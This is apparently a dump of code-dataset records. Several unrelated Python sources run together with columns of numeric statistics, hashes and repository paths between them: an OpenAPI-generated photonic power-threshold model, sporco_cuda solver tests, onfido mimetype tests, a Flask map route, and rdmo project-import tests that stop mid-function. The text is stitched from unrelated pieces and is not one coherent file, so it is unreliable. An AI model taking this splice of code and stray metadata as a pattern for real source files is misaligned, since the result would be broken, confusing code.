    def __init__(self, total_power_upper_warn_threshold_default=None, total_power_lower_warn_threshold_min=None, total_power_upper_warn_threshold_min=None, total_power_upper_warn_threshold_max=None, total_power_lower_warn_threshold_max=None, total_power_lower_warn_threshold_default=None):  # noqa: E501
        """TapiPhotonicMediaTotalPowerThresholdPac - a model defined in OpenAPI

        :param total_power_upper_warn_threshold_default: The total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.  # noqa: E501
        :type total_power_upper_warn_threshold_default: str
        :param total_power_lower_warn_threshold_min: The total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.  # noqa: E501
        :type total_power_lower_warn_threshold_min: str
        :param total_power_upper_warn_threshold_min: The total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.  # noqa: E501
        :type total_power_upper_warn_threshold_min: str
        :param total_power_upper_warn_threshold_max: The total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.  # noqa: E501
        :type total_power_upper_warn_threshold_max: str
        :param total_power_lower_warn_threshold_max: The total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.  # noqa: E501
        :type total_power_lower_warn_threshold_max: str
        :param total_power_lower_warn_threshold_default: The total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.  # noqa: E501
        :type total_power_lower_warn_threshold_default: str
        """
        self.openapi_types = {
            'total_power_upper_warn_threshold_default': str,
            'total_power_lower_warn_threshold_min': str,
            'total_power_upper_warn_threshold_min': str,
            'total_power_upper_warn_threshold_max': str,
            'total_power_lower_warn_threshold_max': str,
            'total_power_lower_warn_threshold_default': str
        }

        self.attribute_map = {
            'total_power_upper_warn_threshold_default': 'total-power-upper-warn-threshold-default',
            'total_power_lower_warn_threshold_min': 'total-power-lower-warn-threshold-min',
            'total_power_upper_warn_threshold_min': 'total-power-upper-warn-threshold-min',
            'total_power_upper_warn_threshold_max': 'total-power-upper-warn-threshold-max',
            'total_power_lower_warn_threshold_max': 'total-power-lower-warn-threshold-max',
            'total_power_lower_warn_threshold_default': 'total-power-lower-warn-threshold-default'
        }

        self._total_power_upper_warn_threshold_default = total_power_upper_warn_threshold_default
        self._total_power_lower_warn_threshold_min = total_power_lower_warn_threshold_min
        self._total_power_upper_warn_threshold_min = total_power_upper_warn_threshold_min
        self._total_power_upper_warn_threshold_max = total_power_upper_warn_threshold_max
        self._total_power_lower_warn_threshold_max = total_power_lower_warn_threshold_max
        self._total_power_lower_warn_threshold_default = total_power_lower_warn_threshold_default

    @classmethod
    def from_dict(cls, dikt) -> 'TapiPhotonicMediaTotalPowerThresholdPac':
        """Returns the dict as a model

        :param dikt: A dict.
        :type: dict
        :return: The tapi.photonic.media.TotalPowerThresholdPac of this TapiPhotonicMediaTotalPowerThresholdPac.  # noqa: E501
        :rtype: TapiPhotonicMediaTotalPowerThresholdPac
        """
        return util.deserialize_model(dikt, cls)

    @property
    def total_power_upper_warn_threshold_default(self):
        """Gets the total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the default threshold that was set  # noqa: E501

        :return: The total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.
        :rtype: str
        """
        return self._total_power_upper_warn_threshold_default

    @total_power_upper_warn_threshold_default.setter
    def total_power_upper_warn_threshold_default(self, total_power_upper_warn_threshold_default):
        """Sets the total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the default threshold that was set  # noqa: E501

        :param total_power_upper_warn_threshold_default: The total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.
        :type total_power_upper_warn_threshold_default: str
        """
        self._total_power_upper_warn_threshold_default = total_power_upper_warn_threshold_default

    @property
    def total_power_lower_warn_threshold_min(self):
        """Gets the total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the lower threshold that was set  # noqa: E501

        :return: The total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.
        :rtype: str
        """
        return self._total_power_lower_warn_threshold_min

    @total_power_lower_warn_threshold_min.setter
    def total_power_lower_warn_threshold_min(self, total_power_lower_warn_threshold_min):
        """Sets the total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the lower threshold that was set  # noqa: E501

        :param total_power_lower_warn_threshold_min: The total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.
        :type total_power_lower_warn_threshold_min: str
        """
        self._total_power_lower_warn_threshold_min = total_power_lower_warn_threshold_min

    @property
    def total_power_upper_warn_threshold_min(self):
        """Gets the total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the lower threshold that was set  # noqa: E501

        :return: The total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.
        :rtype: str
        """
        return self._total_power_upper_warn_threshold_min

    @total_power_upper_warn_threshold_min.setter
    def total_power_upper_warn_threshold_min(self, total_power_upper_warn_threshold_min):
        """Sets the total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the lower threshold that was set  # noqa: E501

        :param total_power_upper_warn_threshold_min: The total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac.
        :type total_power_upper_warn_threshold_min: str
        """
        self._total_power_upper_warn_threshold_min = total_power_upper_warn_threshold_min

    @property
    def total_power_upper_warn_threshold_max(self):
        """Gets the total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the upper threshold that was set  # noqa: E501

        :return: The total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.
        :rtype: str
        """
        return self._total_power_upper_warn_threshold_max

    @total_power_upper_warn_threshold_max.setter
    def total_power_upper_warn_threshold_max(self, total_power_upper_warn_threshold_max):
        """Sets the total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the upper threshold that was set  # noqa: E501

        :param total_power_upper_warn_threshold_max: The total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.
        :type total_power_upper_warn_threshold_max: str
        """
        self._total_power_upper_warn_threshold_max = total_power_upper_warn_threshold_max

    @property
    def total_power_lower_warn_threshold_max(self):
        """Gets the total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the upper threshold that was set  # noqa: E501

        :return: The total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.
        :rtype: str
        """
        return self._total_power_lower_warn_threshold_max

    @total_power_lower_warn_threshold_max.setter
    def total_power_lower_warn_threshold_max(self, total_power_lower_warn_threshold_max):
        """Sets the total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the upper threshold that was set  # noqa: E501

        :param total_power_lower_warn_threshold_max: The total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac.
        :type total_power_lower_warn_threshold_max: str
        """
        self._total_power_lower_warn_threshold_max = total_power_lower_warn_threshold_max

    @property
    def total_power_lower_warn_threshold_default(self):
        """Gets the total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the default threshold that was set  # noqa: E501

        :return: The total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.
        :rtype: str
        """
        return self._total_power_lower_warn_threshold_default

    @total_power_lower_warn_threshold_default.setter
    def total_power_lower_warn_threshold_default(self, total_power_lower_warn_threshold_default):
        """Sets the total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.

        Can read the value of the default threshold that was set  # noqa: E501

        :param total_power_lower_warn_threshold_default: The total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac.
        :type total_power_lower_warn_threshold_default: str
        """
        self._total_power_lower_warn_threshold_default = total_power_lower_warn_threshold_default
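# Hedged round-trip sketch (not part of the generated file): from_dict delegates
# to tapi_server.util.deserialize_model, which maps the kebab-case wire keys in
# attribute_map above onto the snake_case properties:
#
#     pac = TapiPhotonicMediaTotalPowerThresholdPac.from_dict(
#         {'total-power-upper-warn-threshold-default': '-2.0'})
#     assert pac.total_power_upper_warn_threshold_default == '-2.0'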
51.623188
303
0.783081
1,330
10,686
5.791729
0.061654
0.171362
0.128521
0.162794
0.914319
0.907439
0.904063
0.875893
0.848371
0.758795
0
0.007569
0.171626
10,686
206
304
51.873786
0.86263
0.514224
0
0.264706
0
0
0.155887
0.155887
0
0
0
0
0
1
0.205882
false
0
0.073529
0
0.397059
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
8
c8e2f59eabb830bff31f3690beee12eb7351ca18
11,784
py
Python
sporco_cuda/tests/test_cbpdn.py
young-oct/sporco-cuda
7fb2269d48842cda849293f3a0633026c601dcfa
[ "BSD-3-Clause" ]
null
null
null
sporco_cuda/tests/test_cbpdn.py
young-oct/sporco-cuda
7fb2269d48842cda849293f3a0633026c601dcfa
[ "BSD-3-Clause" ]
null
null
null
sporco_cuda/tests/test_cbpdn.py
young-oct/sporco-cuda
7fb2269d48842cda849293f3a0633026c601dcfa
[ "BSD-3-Clause" ]
null
null
null
from __future__ import division
from builtins import object

import numpy as np

from sporco.admm import cbpdn
import sporco_cuda.cbpdn as cucbpdn
import sporco.metric as sm
import sporco.signal as ss


class TestSet01(object):

    def setup_method(self, method):
        np.random.seed(12345)

    def test_01(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        lmbda = 1e-1
        opt = cbpdn.ConvBPDN.Options({'Verbose': False, 'MaxMainIter': 50,
                                      'AutoRho': {'Enabled': False}})
        b = cbpdn.ConvBPDN(D, s, lmbda, opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdn(D, s, lmbda, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_02(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        lmbda = 1e-1
        Wl1 = np.random.randn(1, 1, M).astype(np.float32)
        opt = cbpdn.ConvBPDN.Options(
            {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1,
             'AutoRho': {'Enabled': False}})
        b = cbpdn.ConvBPDN(D, s, lmbda, opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdn(D, s, lmbda, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_03(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        lmbda = 1e-1
        Wl1 = np.random.randn(1, 1, M).astype(np.float32)
        Wl1[0] = 0.0
        opt = cbpdn.ConvBPDN.Options(
            {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1,
             'AutoRho': {'Enabled': False}})
        b = cbpdn.ConvBPDN(D, s, lmbda, opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdn(D, s, lmbda, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_04(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        lmbda = 1e-1
        Wl1 = np.random.randn(Nr, Nc, M).astype(np.float32)
        opt = cbpdn.ConvBPDN.Options(
            {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1,
             'AutoRho': {'Enabled': False}})
        b = cbpdn.ConvBPDN(D, s, lmbda, opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdn(D, s, lmbda, opt)
        assert(sm.mse(X1, X2) < 1e-6)

    def test_05(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        lmbda = 1e-1
        mu = 1e-2
        opt = cbpdn.ConvBPDNGradReg.Options(
            {'Verbose': False, 'MaxMainIter': 50,
             'AutoRho': {'Enabled': False}})
        b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_06(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        lmbda = 1e-1
        mu = 1e-2
        Wgrd = np.random.randn(M).astype(np.float32)
        opt = cbpdn.ConvBPDNGradReg.Options(
            {'Verbose': False, 'MaxMainIter': 50, 'GradWeight': Wgrd,
             'AutoRho': {'Enabled': False}})
        b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_07(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        lmbda = 1e-1
        mu = 1e-2
        Wl1 = np.random.randn(1, 1, M).astype(np.float32)
        opt = cbpdn.ConvBPDNGradReg.Options(
            {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1,
             'AutoRho': {'Enabled': False}})
        b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_08(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        lmbda = 1e-1
        mu = 1e-2
        Wl1 = np.random.randn(Nr, Nc, M).astype(np.float32)
        opt = cbpdn.ConvBPDNGradReg.Options(
            {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1,
             'AutoRho': {'Enabled': False}})
        b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_09(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        lmbda = 1e-1
        mu = 1e-2
        Wl1 = np.random.randn(Nr, Nc, M).astype(np.float32)
        Wgrd = np.random.randn(M).astype(np.float32)
        opt = cbpdn.ConvBPDNGradReg.Options(
            {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1,
             'GradWeight': Wgrd, 'AutoRho': {'Enabled': False}})
        b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_10(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        frc = 0.5
        msk = ss.rndmask(s.shape, frc, dtype=np.float32)
        s *= msk
        lmbda = 1e-1
        opt = cbpdn.ConvBPDN.Options({'Verbose': False, 'MaxMainIter': 50,
                                      'AutoRho': {'Enabled': False}})
        b = cbpdn.AddMaskSim(cbpdn.ConvBPDN, D, s, msk, lmbda, opt=opt)
        X1 = b.solve()
        X2 = cucbpdn.cbpdnmsk(D, s, msk, lmbda, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_11(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        frc = 0.5
        msk = ss.rndmask(s.shape, frc, dtype=np.float32)
        s *= msk
        lmbda = 1e-1
        # Create a random ℓ1 term weighting array. There is no need to
        # extend this array to account for the AMS impulse filter since
        # this is taken care of automatically by cucbpdn.cbpdnmsk
        Wl1 = np.random.randn(1, 1, M).astype(np.float32)
        # Append a zero entry to the L1Weight array, corresponding to
        # the impulse filter appended to the dictionary by cbpdn.AddMaskSim,
        # since this is not done automatically by cbpdn.AddMaskSim
        Wl1i = np.concatenate((Wl1, np.zeros(Wl1.shape[0:-1] + (1,))), axis=-1)
        opt = cbpdn.ConvBPDN.Options({'Verbose': False, 'MaxMainIter': 50,
                                      'AutoRho': {'Enabled': False}})
        opt['L1Weight'] = Wl1i
        b = cbpdn.AddMaskSim(cbpdn.ConvBPDN, D, s, msk, lmbda, opt=opt)
        X1 = b.solve()
        opt['L1Weight'] = Wl1
        X2 = cucbpdn.cbpdnmsk(D, s, msk, lmbda, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_12(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        frc = 0.5
        msk = ss.rndmask(s.shape, frc, dtype=np.float32)
        s *= msk
        lmbda = 1e-1
        mu = 1e-2
        # Since cucbpdn.cbpdngrdmsk automatically ensures that the ℓ2 of
        # gradient term is not applied to the AMS impulse filter, while
        # cbpdn.AddMaskSim does not, we have to pass a GradWeight array
        # with a zero entry corresponding to the AMS impulse filter to
        # cbpdn.AddMaskSim
        Wgrdi = np.hstack((np.ones(M,), np.zeros((1,))))
        opt = cbpdn.ConvBPDNGradReg.Options(
            {'Verbose': False, 'MaxMainIter': 50,
             'AutoRho': {'Enabled': False}})
        opt['GradWeight'] = Wgrdi
        b = cbpdn.AddMaskSim(cbpdn.ConvBPDNGradReg, D, s, msk, lmbda, mu, opt)
        X1 = b.solve()
        opt['GradWeight'] = 1.0
        X2 = cucbpdn.cbpdngrdmsk(D, s, msk, lmbda, mu, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_13(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        frc = 0.5
        msk = ss.rndmask(s.shape, frc, dtype=np.float32)
        s *= msk
        lmbda = 1e-1
        mu = 1e-2
        # Create a random ℓ1 term weighting array. There is no need to
        # extend this array to account for the AMS impulse filter since
        # this is taken care of automatically by cucbpdn.cbpdngrdmsk
        Wl1 = np.random.randn(1, 1, M).astype(np.float32)
        # Append a zero entry to the L1Weight array, corresponding to
        # the impulse filter appended to the dictionary by cbpdn.AddMaskSim,
        # since this is not done automatically by cbpdn.AddMaskSim
        Wl1i = np.concatenate((Wl1, np.zeros(Wl1.shape[0:-1] + (1,))), axis=-1)
        # Since cucbpdn.cbpdngrdmsk automatically ensures that the ℓ2 of
        # gradient term is not applied to the AMS impulse filter, while
        # cbpdn.AddMaskSim does not, we have to pass a GradWeight array
        # with a zero entry corresponding to the AMS impulse filter to
        # cbpdn.AddMaskSim
        Wgrdi = np.hstack((np.ones(M,), np.zeros((1,))))
        opt = cbpdn.ConvBPDNGradReg.Options(
            {'Verbose': False, 'MaxMainIter': 50,
             'AutoRho': {'Enabled': False}})
        opt['L1Weight'] = Wl1i
        opt['GradWeight'] = Wgrdi
        b = cbpdn.AddMaskSim(cbpdn.ConvBPDNGradReg, D, s, msk, lmbda, mu, opt)
        X1 = b.solve()
        opt['L1Weight'] = Wl1
        opt['GradWeight'] = 1.0
        X2 = cucbpdn.cbpdngrdmsk(D, s, msk, lmbda, mu, opt)
        assert(sm.mse(X1, X2) < 1e-8)

    def test_14(self):
        Nr = 32
        Nc = 31
        Nd = 5
        M = 4
        D = np.random.randn(Nd, Nd, M).astype(np.float32)
        s = np.random.randn(Nr, Nc).astype(np.float32)
        frc = 0.5
        msk = ss.rndmask(s.shape, frc, dtype=np.float32)
        s *= msk
        lmbda = 1e-1
        mu = 1e-2
        # Create a random ℓ2 of gradient term weighting array. There is no
        # need to extend this array to account for the AMS impulse filter
        # since this is taken care of automatically by cucbpdn.cbpdngrdmsk
        Wgrd = np.random.randn(M).astype(np.float32)
        # Append a zero entry to the GradWeight array, corresponding to
        # the impulse filter appended to the dictionary by cbpdn.AddMaskSim,
        # since this is not done automatically by cbpdn.AddMaskSim
        Wgrdi = np.hstack((Wgrd, np.zeros((1,))))
        opt = cbpdn.ConvBPDNGradReg.Options(
            {'Verbose': False, 'MaxMainIter': 50,
             'AutoRho': {'Enabled': False}})
        opt['GradWeight'] = Wgrdi
        b = cbpdn.AddMaskSim(cbpdn.ConvBPDNGradReg, D, s, msk, lmbda, mu, opt)
        X1 = b.solve()
        opt['GradWeight'] = Wgrd
        X2 = cucbpdn.cbpdngrdmsk(D, s, msk, lmbda, mu, opt)
        assert(sm.mse(X1, X2) < 1e-8)
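# Why the masked tests pad their weight arrays (editorial sketch, not part of
# the file): cbpdn.AddMaskSim appends one impulse filter to the M-filter
# dictionary, so any per-filter weight needs a matching zero entry before it is
# handed to the CPU solver, while the CUDA wrappers do this internally:
#
#     Wl1 = np.random.randn(1, 1, M).astype(np.float32)    # shape (1, 1, M)
#     Wl1i = np.concatenate((Wl1, np.zeros(Wl1.shape[0:-1] + (1,))), axis=-1)
#     assert Wl1i.shape == (1, 1, M + 1)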
34.156522
78
0.538103
1,623
11,784
3.89464
0.088108
0.062648
0.080209
0.063281
0.950957
0.9489
0.9489
0.944945
0.942256
0.942256
0
0.055857
0.326969
11,784
344
79
34.255814
0.741142
0.139002
0
0.888476
0
0
0.060097
0
0
0
0
0
0.052045
1
0.055762
false
0
0.026022
0
0.085502
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
7402d9b38dad3bb1c6353daa3995ee526af370a5
352
py
Python
tests/test_mimetypes.py
daaain/onfido-python
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
[ "MIT" ]
16
2020-06-30T15:35:42.000Z
2022-02-12T09:26:41.000Z
tests/test_mimetypes.py
daaain/onfido-python
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
[ "MIT" ]
6
2020-07-06T08:56:33.000Z
2021-07-12T18:09:07.000Z
tests/test_mimetypes.py
daaain/onfido-python
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
[ "MIT" ]
5
2020-08-18T08:12:19.000Z
2021-05-26T11:43:53.000Z
from onfido.mimetype import mimetype_from_name


def test_mimetypes():
    assert mimetype_from_name("filename.jpg") == "image/jpeg"
    assert mimetype_from_name("filename.png") == "image/png"
    assert mimetype_from_name("file.pdf") == "application/pdf"


def test_secondary_mimetypes():
    assert mimetype_from_name("filename.jpeg") == "image/jpeg"
35.2
62
0.747159
46
352
5.434783
0.391304
0.24
0.32
0.352
0.432
0.312
0
0
0
0
0
0
0.119318
352
9
63
39.111111
0.806452
0
0
0
0
0
0.252841
0
0
0
0
0
0.571429
1
0.285714
true
0
0.142857
0
0.428571
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
1
1
0
0
0
0
0
0
7
cdb272202dbcfa306d7a095a75e3b628968050fa
128
py
Python
app/controllers/mapa.py
h01000110/gerenciador-oficina-web
f86fe4ae988ac8b94aac4165efe77a29d862a1cd
[ "MIT" ]
null
null
null
app/controllers/mapa.py
h01000110/gerenciador-oficina-web
f86fe4ae988ac8b94aac4165efe77a29d862a1cd
[ "MIT" ]
null
null
null
app/controllers/mapa.py
h01000110/gerenciador-oficina-web
f86fe4ae988ac8b94aac4165efe77a29d862a1cd
[ "MIT" ]
null
null
null
from app import app
from flask import render_template


@app.route("/mapa")
def mapa():
    return render_template("mapa.html")
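# Minimal smoke-test sketch (illustrative; assumes mapa.html exists in the
# app's templates/ directory):
#
#     with app.test_client() as c:
#         resp = c.get("/mapa")
#         assert resp.status_code == 200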
16
39
0.734375
19
128
4.842105
0.578947
0.304348
0
0
0
0
0
0
0
0
0
0
0.148438
128
7
40
18.285714
0.844037
0
0
0
0
0
0.109375
0
0
0
0
0
0
1
0.2
true
0
0.4
0.2
0.8
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
1
1
0
0
7
a833b27483e7f4524518625179b43d0238ee9bfb
7,551
py
Python
rdmo/projects/tests/test_view_project_create_import.py
berkerY/rdmo
c0500f9b6caff9106a254a05e0d0e8018fc8db28
[ "Apache-2.0" ]
77
2016-08-09T11:40:20.000Z
2022-03-06T11:03:26.000Z
rdmo/projects/tests/test_view_project_create_import.py
MSpenger/rdmo
c0500f9b6caff9106a254a05e0d0e8018fc8db28
[ "Apache-2.0" ]
377
2016-07-01T13:59:36.000Z
2022-03-30T13:53:19.000Z
rdmo/projects/tests/test_view_project_create_import.py
MSpenger/rdmo
c0500f9b6caff9106a254a05e0d0e8018fc8db28
[ "Apache-2.0" ]
47
2016-06-23T11:32:19.000Z
2022-03-01T11:34:37.000Z
import os
import re
from pathlib import Path

import pytest

from django.urls import reverse

from rdmo.core.constants import VALUE_TYPE_FILE

from ..models import Project, Value

users = (
    ('owner', 'owner'),
    ('manager', 'manager'),
    ('author', 'author'),
    ('guest', 'guest'),
    ('user', 'user'),
    ('site', 'site'),
    ('anonymous', None),
)

change_project_permission_map = {
    'owner': [1, 2, 3, 4, 5],
    'manager': [1, 3, 5],
    'api': [1, 2, 3, 4, 5],
    'site': [1, 2, 3, 4, 5]
}

projects = [1, 2, 3, 4, 5]


@pytest.mark.parametrize('username,password', users)
def test_project_create_import_get(db, client, username, password):
    client.login(username=username, password=password)

    url = reverse('project_create_import')
    response = client.get(url)

    if password:
        assert response.status_code == 302
        assert response.url == '/projects/'
    else:
        assert response.status_code == 302
        assert response.url.startswith('/account/login/')


@pytest.mark.parametrize('username,password', users)
def test_project_create_import_post_error(db, settings, client, username, password):
    client.login(username=username, password=password)

    url = reverse('project_create_import')
    response = client.post(url, {
        'method': 'wrong'
    })

    if password:
        assert response.status_code == 400
    else:
        assert response.status_code == 302
        assert response.url.startswith('/account/login/')


@pytest.mark.parametrize('username,password', users)
def test_project_create_import_post_upload_file(db, settings, client, username, password):
    client.login(username=username, password=password)

    url = reverse('project_create_import')
    xml_file = os.path.join(settings.BASE_DIR, 'xml', 'project.xml')
    with open(xml_file, encoding='utf8') as f:
        response = client.post(url, {
            'method': 'upload_file',
            'uploaded_file': f
        })

    if password:
        assert response.status_code == 200
        assert b'Create project from project.xml' in response.content
    else:
        assert response.status_code == 302
        assert response.url.startswith('/account/login/')


@pytest.mark.parametrize('username,password', users)
def test_project_create_import_post_upload_file_error(db, settings, client, username, password):
    client.login(username=username, password=password)

    url = reverse('project_create_import')
    xml_file = os.path.join(settings.BASE_DIR, 'xml', 'error.xml')
    with open(xml_file, encoding='utf8') as f:
        response = client.post(url, {
            'method': 'upload_file',
            'uploaded_file': f
        })

    if password:
        assert response.status_code == 400
        assert b'Files of this type cannot be imported.' in response.content
    else:
        assert response.status_code == 302
        assert response.url.startswith('/account/login/')


@pytest.mark.parametrize('username,password', users)
def test_project_create_import_post_upload_file_empty(db, client, username, password):
    client.login(username=username, password=password)

    url = reverse('project_create_import')
    response = client.post(url, {
        'method': 'upload_file'
    })

    if password:
        assert response.status_code == 400
        assert b'There has been an error with your import.' in response.content
    else:
        assert response.status_code == 302
        assert response.url.startswith('/account/login/')


@pytest.mark.parametrize('username,password', users)
def test_project_create_import_post_import_file(db, settings, client, files, username, password):
    client.login(username=username, password=password)
    projects_count = Project.objects.count()

    # upload file
    url = reverse('project_create_import')
    xml_file = os.path.join(settings.BASE_DIR, 'xml', 'project.xml')
    with open(xml_file, encoding='utf8') as f:
        response = client.post(url, {
            'method': 'upload_file',
            'uploaded_file': f
        })

    if password:
        assert response.status_code == 200

        # get keys from the response
        keys = re.findall(r'name=\"(.*?)\"', response.content.decode())

        # import file
        data = {key: ['on'] for key in keys}
        data.update({'method': 'import_file'})
        response = client.post(url, data)

        # check if all the files are where are supposed to be
        for file_value in Value.objects.filter(value_type=VALUE_TYPE_FILE):
            assert Path(settings.MEDIA_ROOT).joinpath(file_value.file.name).exists()

        # assert that the project exists and that there are values
        if password:
            project = Project.objects.order_by('updated').last()

            assert response.status_code == 302
            assert response.url == '/projects/{}/'.format(project.pk)

            # a new project, new values
            assert Project.objects.count() == projects_count + 1
            assert project.values.count() > 0
        else:
            assert response.status_code == 302
            assert response.url.startswith('/account/login/')

            # no new project was created
            assert Project.objects.count() == projects_count
    else:
        assert response.status_code == 302
        assert response.url.startswith('/account/login/')


@pytest.mark.parametrize('username,password', users)
def test_project_create_import_post_empty(db, settings, client, username, password):
    client.login(username=username, password=password)
    projects_count = Project.objects.count()

    # upload file
    url = reverse('project_create_import')
    xml_file = os.path.join(settings.BASE_DIR, 'xml', 'project.xml')
    with open(xml_file, encoding='utf8') as f:
        response = client.post(url, {
            'method': 'upload_file',
            'uploaded_file': f
        })

    if password:
        assert response.status_code == 200

        response = client.post(url, {
            'method': 'import_file'
        })

        # check if all the files are where are supposed to be
        for file_value in Value.objects.filter(value_type=VALUE_TYPE_FILE):
